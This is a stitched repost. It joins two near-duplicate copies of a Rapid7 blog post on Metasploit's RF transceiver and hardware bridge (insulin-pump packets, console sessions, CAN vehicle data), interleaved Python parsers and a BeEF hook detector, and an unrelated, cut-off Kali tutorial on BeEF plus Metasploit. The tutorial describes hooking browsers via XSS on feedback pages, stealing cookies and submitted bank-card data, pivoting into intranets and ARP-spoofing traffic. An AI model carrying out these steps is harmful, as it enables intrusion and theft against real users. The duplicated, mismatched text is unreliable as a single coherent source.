Metasploit's RF Transceiver Capabilities

https://community.rapid7.com/community/metasploit/blog/2017/03/21/metasploits-rf-transceiver-capabilities

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks and use many tools to detect abnormal behavior. We constantly scan for vulnerabilities and publish test results. However, we often fail to recognize the small (and sometimes large) Internet of Things (IoT) devices in our own networks and homes. Alarmingly, considering how pervasive they are, these devices are not easy to test.

Note: RF (Radio Frequency) here refers to wireless radio frequencies in general.

Although difficult, it is technically possible to discover and identify some of these IoT devices through their Ethernet-side connection. But that does not give us a full picture of the risk these devices pose to consumers or enterprises. When you assess only Ethernet-connected devices, you may miss wireless systems that have a major impact on enterprise security. Wireless networks often control alarm systems, surveillance, door access, server-room HVAC controls, and many other areas.

This leaves us with a critical question: how do you really determine the risk of these devices?

Start with the basics:

  • What can these connected devices do?
  • What is the range of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform periodic scans of our 802.11 wireless networks to make sure the access points are secure and the network traffic is not excessive. We can monitor and deploy overlapping APs so that service continues if one of them goes down or suffers nearby electromagnetic interference. But if you ask "what about the rest of the wireless spectrum?", that is exactly the area and direction we set out to study.

You may already be using radio frequencies outside the 802.11 standard for other reasons. A remote-controlled garage door? RFID card readers, wireless security systems, Zigbee-controlled lights or HVAC systems.

What are the frequency ranges of these devices? Are they encrypted or otherwise protected? What happens when they receive interference? Do they fail closed or open?

The inability to answer these questions effectively is the real reason we are releasing the Metasploit Hardware Bridge radio frequency (RF) transceiver, and why we think it will be a critical tool for security researchers and penetration testers in understanding their actual attack surface.

Now security teams will be able to perform a more realistic assessment of a company's security posture: test physical security controls and better understand the security of IoT and other devices.

Much of the activity undertaken in the name of security research can be contentious or hard to understand. But RF testing is certainly justified: as we see more and more technologies using RF communications, this field of research is becoming broader and more common.

The most common criticism of any technology developed for security testing is that attackers can easily abuse it. The security community's usual response: if attackers are already abusing it, then only by understanding what they are doing, effectively replicating their methods, and demonstrating the potential impact can we take the measures needed to stop them.

This is the logic behind Metasploit, and what drives Rapid7's large-scale vulnerability research. It is also why the RF transceiver exists. We firmly believe RF testing is a very important (though currently still overlooked) part of vulnerability testing, and that its importance will keep growing as the IoT ecosystem develops.

One case: in 2016, Rapid7's Jay Radcliffe disclosed multiple vulnerabilities in Johnson & Johnson's Animas OneTouch Ping insulin pump.

Attack demonstration (video): https://v.qq.com/iframe/player.html?vid=h0387fb90nt&width=986&height=739.5&auto=0

The popular pump has a blood glucose meter that acts as a remote control over radio frequency using a proprietary wireless management protocol. Communication between the pump and the remote is transmitted in cleartext rather than encrypted. This creates an opportunity for an attacker with the right technical means and resources to spoof the short-range remote and trigger unauthorized insulin injections.

Although Jay considered the likelihood of an attacker exploiting these vulnerabilities to be low, they could seriously harm patients using the technology. Fortunately, Jay found the problem in time, made recommendations to Johnson & Johnson, and patients were notified so they could mitigate the risk. Without RF testing, these vulnerabilities might have persisted, and patients would have had no chance to choose to protect themselves.

Status-1
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3

Sample packets
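To make concrete what a cleartext, unauthenticated protocol gives away, here is an added Python example (written for this page, not code from Rapid7 or from the pump research) that parses the sample packets printed above, extracts readable strings such as the WEEKDAY profile name, and flags frames that repeat byte-for-byte, the property that lets a captured remote frame be re-sent. Only the printed capture format (direction, hex bytes, ASCII column) is assumed; the meaning of the individual fields is not interpreted.

```python
# Added example, not part of the Rapid7 post: parse the REMOTE/PUMP capture
# printed above and show what a cleartext protocol exposes to anyone listening.
import re

# Constructed from the sample packets on the page (direction, hex bytes, ASCII column).
CAPTURE = """\
Status-1
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3
"""

LINE_RE = re.compile(r"^(REMOTE|PUMP):\s+(.*)$")
HEX_TOKEN = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_capture(text):
    """Return (direction, payload bytes) for each REMOTE/PUMP line.

    Hex tokens are read until the first token that is not two hex digits,
    which is where the printed ASCII column starts.
    """
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        payload = bytearray()
        for tok in m.group(2).split():
            if not HEX_TOKEN.match(tok):
                break
            payload.append(int(tok, 16))
        frames.append((m.group(1), bytes(payload)))
    return frames


def printable_runs(data, min_len=4):
    """Runs of printable ASCII of at least min_len bytes (e.g. the WEEKDAY profile name)."""
    runs, cur = [], bytearray()
    for b in data + b"\x00":  # trailing sentinel flushes the final run
        if 0x20 <= b < 0x7F:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    return runs


def repeated_frames(frames):
    """Payloads that occur verbatim more than once in the capture.

    A frame that is sent byte-for-byte identically twice carries no nonce,
    counter or MAC tying it to one exchange; that absence of freshness is
    what makes an unauthenticated remote spoofable.
    """
    counts = {}
    for direction, payload in frames:
        counts[(direction, payload)] = counts.get((direction, payload), 0) + 1
    return [(d, p.hex(), n) for (d, p), n in counts.items() if n > 1]


def cleartext_report(text):
    """Summarise each frame (direction, length, readable strings) plus repeats."""
    frames = parse_capture(text)
    return {
        "frames": [(d, len(p), printable_runs(p)) for d, p in frames],
        "repeats": repeated_frames(frames),
    }


if __name__ == "__main__":
    report = cleartext_report(CAPTURE)
    for entry in report["frames"]:
        print(entry)
    print("repeated frames:", report["repeats"])
```

Run stand-alone it lists every frame with any readable strings (only the profile name WEEKDAY survives the 4-byte threshold) and reports that the first REMOTE frame appears twice in the capture.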

How it works

Before explaining how it works, a quick note: Rapid7 does not sell the hardware required for RF testing. You can obtain it anywhere, for example from Hacker Warehouse, Hak5, Taobao, JD.com, Amazon, or any electronics store that sells wireless equipment.

With the radio frequency (RF) transceiver, security professionals can craft and monitor different RF packets to properly identify and access a company's wireless systems beyond Ethernet.

The first RF transceiver release supports the TI cc11xx low-power Sub-1GHz RF transceiver. The RF transceiver can tune the device to identify and demodulate signals, and can even create short bursts of interference to identify failure states. This release also provides a full API compatible with the popular RfCat python framework for the TI cc11xx chipset. If your existing programs use RfCat, you can easily port them into Metasploit. This release ships with two post modules: an amplitude modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use the RF Transceiver

Using the new RF transceiver requires buying an RfCat-compatible device such as the Yard Stick One. Then download the latest RfCat drivers; among them you will find rfcat_msfrelay, the Metasploit Framework relay server for RfCat, which runs on the system with the RfCat-compatible device attached.

You can then connect to the hardware bridge:

$./msfconsole -q
msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600
[+] HWBridge session established
[*] HW Specialty: {"rftransceiver"=>true} Capabilities: {"cc11xx"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 hwbridge cmd/hardware rftransceiver 127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > status
[*] Operational: Yes
[*] Device: YARDSTICKONE
[*] FW Version: 450
[*] HW Version: 0348

To learn more about the RF Transceiver, download the latest Metasploit here:

https://www.rapid7.com/products/metasploit/download/community

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

Which leaves us with one very critical question: how do you really determine the risk of these devices?

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers, included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

Then you can connect with the hardware bridge:

./msfconsole -q
msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600
[+] HWBridge session established
[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions

Active sessions
===============

Id  Type                   Information    Connection
--  ----                   -----------    ----------
1   hwbridge cmd/hardware  rftransceiver  127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > status
[*] Operational: Yes
[*] Device: YARDSTICKONE
[*] FW Version: 450
[*] HW Version: 0348

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/

Metasploit supports IoT security testing

Metasploit is a free, downloadable framework that makes it easy to obtain, develop, and execute attacks against vulnerabilities in computer software.

After H.D. Moore released Metasploit in 2003, "penetration testing" a target seemed to become much easier. But in 2016, faced with the security threats of the Internet of Things, Metasploit seemed to have no answer, which left many people disappointed.

Recently, Rapid7 announced that the Metasploit framework has been updated to support security testing of IoT hardware.

This week the Rapid7 blog announced that hardware including modern vehicle Controller Area Networks (CAN), IoT devices, and industrial control systems can now be penetration tested with Metasploit.

The extension, called the "Hardware Bridge API", makes Metasploit the first penetration testing tool that covers both software and hardware. It communicates wirelessly, breaking through the network restrictions that previously blocked penetration testing and controlling the hardware directly, and it also saves developers the trouble of building custom tools for each kind of hardware.

Rapid7 security researcher Craig Smith says device makers can connect to Metasploit in two ways: by building Metasploit support directly into the firmware, or by creating a relay service, especially when the device cannot use Ethernet, for example a software-defined radio that is only connected over USB.

The core functions of the HWBridge API include collecting device capability information, version data, or power-related information, plus separate extensions for testing different kinds of physical device. When testing a vehicle's Controller Area Network, for example, it supports CAN and provides several related commands for penetration testing.

Example:

The newly released version supports SocketCAN. If you have a Linux system and a SocketCAN-capable CAN bus sniffer, you can test it. The local_hwbridge module is an example of a simple relay service; you can run it locally or on a remote server.

msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/6xOv7GqFs3YTeIE
[*] Local IP: http://10.1.10.21:8080/6xOv7GqFs3YTeIE
[*] Server started.
msf auxiliary(local_hwbridge) >

By default the local_hwbridge module detects any SocketCAN interfaces and needs no options. The relay service does not have to run inside Metasploit; if the hardware itself exposes a REST API you can skip this step.

msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > set rhost 10.1.10.21
rhost => 10.1.10.21
msf auxiliary(connect) > set targeturi 6xOv7GqFs3YTeIE
targeturi => 6xOv7GqFs3YTeIE
msf auxiliary(connect) > run
[*] Attempting to connect to 10.1.10.21...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-01-17 11:02:34 -0800
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions
 
Active sessions
===============
 
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (10.1.10.21)

Once the device is connected, an HWBridge session is established. If you are familiar with meterpreter, you will feel at home with hwbridge. Type help for a list of commands, or run a specific module such as getvinfo (get vehicle information).

msf auxiliary(connect) > sess 1
[*] Starting interaction with 1...
hwbridge > supported_buses
Available buses
 
can0, can1, can2
 
hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2
[*] Available PIDS for pulling realtime data: 46 pids
[*]   [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76]
[*]   MIL (Engine Light) : OFF
[*]   Number of DTCs: 0
[*]   Engine Temp: 48 °C / 118 °F
[*]   RPMS: 0
[*]   Speed: 0 km/h  /  0.0 mph
[*] Supported OBD Standards: OBD and OBD-II
[*] Mode $09 Vehicle Info Supported PIDS: [2, 4, 6, 8]
[*] VIN: 1G1ZT53826F109149
[*] Calibration ID: UDS ERR: {"RCRRP"=>"Request Correctly Received, but Response is Pending"}
[*] PID 6 Response: ["00", "00", "C4", "E9", "00", "00", "17", "33", "00", "00", "00", "00"]
[*] PID 8 Response: ["00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00", "00"]
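The fields getvinfo prints come from standard OBD-II (SAE J1979 mode 01) responses, and the "RCRRP" error is the UDS negative response code 0x78. As an added example that is not part of the Metasploit module or of the article, the Python below decodes constructed ECU response frames on the standard response ID 0x7E8 (supported-PID bitmask, MIL and DTC count, coolant temperature, RPM, speed, and a mode 09 "response pending" negative response) into the same summary. The frame bytes are constructed to reproduce the values printed above; the CAN ID, frame layout and formulas are the standard ones.

```python
# Added example, not part of the Rapid7 post or the getvinfo module: decode
# standard OBD-II (SAE J1979 mode 01) responses into the fields getvinfo prints.

# UDS negative response codes (ISO 14229) a diagnostic request can return.
NRC = {
    0x11: "Service Not Supported",
    0x12: "Sub-Function Not Supported",
    0x31: "Request Out Of Range",
    0x78: "Request Correctly Received, but Response is Pending",  # "RCRRP" above
}

ECU_RESPONSE_ID = 0x7E8  # standard 11-bit response ID of the first ECU

# Constructed ECU frames: [length, mode + 0x40, pid, data...]; values chosen to
# reproduce the summary printed by getvinfo above.
SAMPLE_FRAMES = [
    (ECU_RESPONSE_ID, bytes([0x06, 0x41, 0x00, 0xBE, 0x1F, 0xA8, 0x13])),  # PIDs 01-20 bitmask
    (ECU_RESPONSE_ID, bytes([0x06, 0x41, 0x01, 0x00, 0x07, 0x65, 0x04])),  # MIL off, 0 DTCs
    (ECU_RESPONSE_ID, bytes([0x03, 0x41, 0x05, 0x58])),                    # 0x58 - 40 = 48 C
    (ECU_RESPONSE_ID, bytes([0x04, 0x41, 0x0C, 0x00, 0x00])),              # RPM 0
    (ECU_RESPONSE_ID, bytes([0x03, 0x41, 0x0D, 0x00])),                    # 0 km/h
    (ECU_RESPONSE_ID, bytes([0x03, 0x7F, 0x09, 0x78])),                    # mode 09: response pending
]


def parse_obd_response(data):
    """Split an ISO 15765 single-frame OBD response into (mode, pid, payload).

    Returns ("negative", service, nrc) for a 0x7F negative response.
    """
    length = data[0]
    body = data[1:1 + length]
    if body[0] == 0x7F:
        return ("negative", body[1], body[2])
    return (body[0] - 0x40, body[1], bytes(body[2:]))


def supported_pids(bitmask, base=0x00):
    """Decode a 4-byte 'supported PIDs' bitmask: bit 7 of byte A is PID base+1."""
    pids = []
    for i, byte in enumerate(bitmask[:4]):
        for bit in range(8):
            if byte & (0x80 >> bit):
                pids.append(base + i * 8 + bit + 1)
    return pids


def decode_pid(pid, d):
    """Standard mode 01 formulas for the PIDs getvinfo reports."""
    if pid == 0x01:  # monitor status: MIL flag and stored DTC count
        return {"mil": bool(d[0] & 0x80), "dtc_count": d[0] & 0x7F}
    if pid == 0x05:  # engine coolant temperature, A - 40 degrees C
        c = d[0] - 40
        return {"engine_temp_c": c, "engine_temp_f": round(c * 9 / 5 + 32)}
    if pid == 0x0C:  # engine RPM, (256A + B) / 4
        return {"rpm": (256 * d[0] + d[1]) / 4}
    if pid == 0x0D:  # vehicle speed, A km/h
        return {"speed_kmh": d[0], "speed_mph": round(d[0] * 0.621371, 1)}
    return {}


def vehicle_summary(frames):
    """Build a getvinfo-style summary from (can_id, data) frames."""
    summary = {"errors": []}
    for can_id, data in frames:
        if can_id != ECU_RESPONSE_ID:
            continue
        parsed = parse_obd_response(data)
        if parsed[0] == "negative":
            summary["errors"].append((parsed[1], NRC.get(parsed[2], "unknown")))
            continue
        mode, pid, payload = parsed
        if mode == 0x01 and pid == 0x00:
            summary["supported_pids"] = supported_pids(payload)
        elif mode == 0x01:
            summary.update(decode_pid(pid, payload))
    return summary


if __name__ == "__main__":
    for key, value in vehicle_summary(SAMPLE_FRAMES).items():
        print(f"{key}: {value}")
```

The supported-PID bitmask decoding is the general mechanism behind the "Available PIDS" list above: PID 0x00 covers PIDs 1-32, and the same function with base=0x20 or base=0x40 decodes the next two blocks.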

More hardware modes coming

Reportedly, the Metasploit open-source community already contains 1,600 vulnerabilities and 3,300 modules, and Rapid7, which maintains Metasploit, says more features will be added later.

For details see:

http://opengarages.org/hwbridge/#get-a-list-of-methods

https://www.rapid7.com/about/press-releases/rapid7-enables-iot-hardware-security-testing-with-metasploit/

https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix

http://www.darkreading.com/vulnerabilities—threats/metasploit-can-now-be-directly-linked-to-hardware-for-vulnerability-testing/d/d-id/1328047

Can't wait? Give it a try. O(∩_∩)O~

Reposted from:

WeChat official account: 开源恶意代码基准测试 (Open-Source Malware Benchmark Testing)

Kali Linux penetration testing: chaining Metasploit and BeEF to get into a corporate intranet

0x01: Background

BeEF is currently the most popular web attack framework in Europe and the US; its full name is The Browser Exploitation Framework Project. BeEF uses a simple XSS vulnerability and a prepared piece of JavaScript (hook.js) to control the target host's browser, collects detailed information about the host through that browser, and goes on to scan the intranet. Combined with Metasploit it is a formidable tool for internal network penetration.

Official site: http://beefproject.com/

Blog: http://blog.beefproject.com/

0x02 Installation

BeEF is not installed by default on Kali Linux, so install it yourself:

apt-get update
apt-get install beef-xss

0x03 Getting started

0x03.1 Starting BeEF

Main directory:

/usr/share/beef-xss

cd /usr/share/beef-xss

./beef

Open 127.0.0.1:3000/ui/panel

Username / password:

beef/beef

Demo page: <Beef-Xss ip>:3000/demos/butcher/index.html

Test that the two hosts can reach each other over the network.

Visit the BeEF demo page: the demo page embeds hook.js, so visiting it hooks the browser.

0x04 Planting the hook:

Add a script tag to a normal page to embed the malicious script.
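From the defender's side, the injection described above leaves two fingerprints: a script tag loading hook.js from a foreign host, and the hooked browser's follow-up requests carrying the BEEFHOOK session identifier (both names come from the hook_file and hook_session_name settings in the config file shown later in this article). The Python below is an added example, not part of the article or of BeEF, that scans a constructed page fragment and constructed proxy log lines for both indicators. The /dh polling path is an assumption about the hook's XHR channel and the address 203.0.113.10 is a constructed value.

```python
# Added example, not part of the article or of BeEF: detection logic a defender
# can run over page source and web-proxy logs to spot a BeEF hook. It keys on
# the values in the article's config (hook_file "/hook.js", session name
# "BEEFHOOK"); the "/dh" polling path is an assumption and can be adjusted.
import re

HOOK_SCRIPT_RE = re.compile(
    r"""<script[^>]*\ssrc\s*=\s*["']([^"']*?/hook\.js(?:\?[^"']*)?)["']""", re.I)
HOOK_REQUEST_RE = re.compile(r"\s(?:GET|POST)\s+(\S*?/(?:hook\.js|dh)\b\S*)")
HOOK_COOKIE_RE = re.compile(r"\bBEEFHOOK=([A-Za-z0-9]+)")

# Constructed page fragment: one legitimate script tag, one injected hook.
SAMPLE_HTML = """
<html><body>
<script src="/static/jquery.min.js"></script>
<p>feedback form</p>
<script src="http://203.0.113.10:3000/hook.js"></script>
</body></html>
"""

# Constructed proxy log lines: client, method, url, cookie header.
SAMPLE_LOG = [
    '10.1.2.30 GET http://intranet.example/feedback.html cookie="-"',
    '10.1.2.30 GET http://203.0.113.10:3000/hook.js cookie="-"',
    '10.1.2.30 GET http://203.0.113.10:3000/dh?BEEFHOOK=abcd1234 cookie="BEEFHOOK=abcd1234"',
    '10.1.2.31 GET http://www.example.com/index.html cookie="sid=xyz"',
]


def find_hook_script_tags(html):
    """Return the src URLs of script tags that load a hook.js."""
    return HOOK_SCRIPT_RE.findall(html)


def scan_proxy_log(lines):
    """Return (line_no, client, indicator) for requests that look like hook traffic."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if not parts:
            continue
        client = parts[0]
        m = HOOK_REQUEST_RE.search(line)
        if m:
            findings.append((n, client, "hook request " + m.group(1)))
        c = HOOK_COOKIE_RE.search(line)
        if c:
            findings.append((n, client, "BEEFHOOK session " + c.group(1)))
    return findings


def hooked_clients(lines):
    """Distinct client addresses with any hook indicator, for triage."""
    return sorted({client for _, client, _ in scan_proxy_log(lines)})


if __name__ == "__main__":
    print("injected script tags:", find_hook_script_tags(SAMPLE_HTML))
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
    print("clients to investigate:", hooked_clients(SAMPLE_LOG))
```

The page scan is the check to run on content a site serves (feedback and complaint pages accept user input, as the article notes), and the log scan is the check to run at the proxy; a client that shows up in both is a hooked browser that needs to be cleaned up and its session cookies invalidated.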

In a real penetration test (which needs a public IP), how do you get the victim to open the page that embeds hook.js?

Website feedback and complaint pages are one example: "Using an XSS platform to compromise the back end of Baidu's complaint center".

That author used an XSS platform rather than BeEF. With BeEF you not only get the back-end administrator's cookie; combined with Metasploit you can also use the administrator's browser as a stepping stone into the company intranet.

Online Browsers -> right-click -> Use As Proxy

Combine this with ARP spoofing and MITM attacks to redirect all HTTP requests in the intranet, and basically... (you know the rest).

The BeEF back end shows a host coming online (feels like the old days of Gray Pigeon and Shangxing =。= )

Through the browser we can see a lot of information about the target host:

Browser information:
  Name
  Version
  Browser UA string
  Browser platform
  Window size
Plugin information:
  Flash
  VBScript
  WebSocket
  QuickTime
  ...
API information
Cookies
Operating system information
Date and time
Hardware information:
  CPU (32/64-bit)
  Screen resolution
  Touchscreen support

And so on

Testing with Firefox

BeEF function modules

Common functions/modules

Browser: get browser information
--Hooked Domain
-----Get Cookie: get the client's cookies; run it once and the cookie is displayed on the right;
-----Get Form Values: capture form data submitted on the page, such as bank card details or the username and password on a registration page;
-----Redirect Browser: redirect the browser

After running it, any site the target browser visits is redirected to bobao.360.cn. In a real penetration test, run an ARP attack inside the intranet and redirect all intranet HTTP traffic to the page that embeds the hook script... (cue a wicked grin)

Chrome Extensions:
Debug: test HTTP requests
Exploits: attack using browser vulnerabilities
Host: get information about the victim host
Metasploit: integrate with Metasploit for penetration; this is the focus of this article.
Network: DoSer, ping, DNS enumeration, port scanning, etc.
Social Engineering: social engineering modules

0x05 Integrating with Metasploit

BeEF configuration file:

/usr/share/beef-xss/config.yaml

metasploit:
    enable: false

Change it to:

metasploit:
    enable: true

vim /usr/share/beef-xss/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
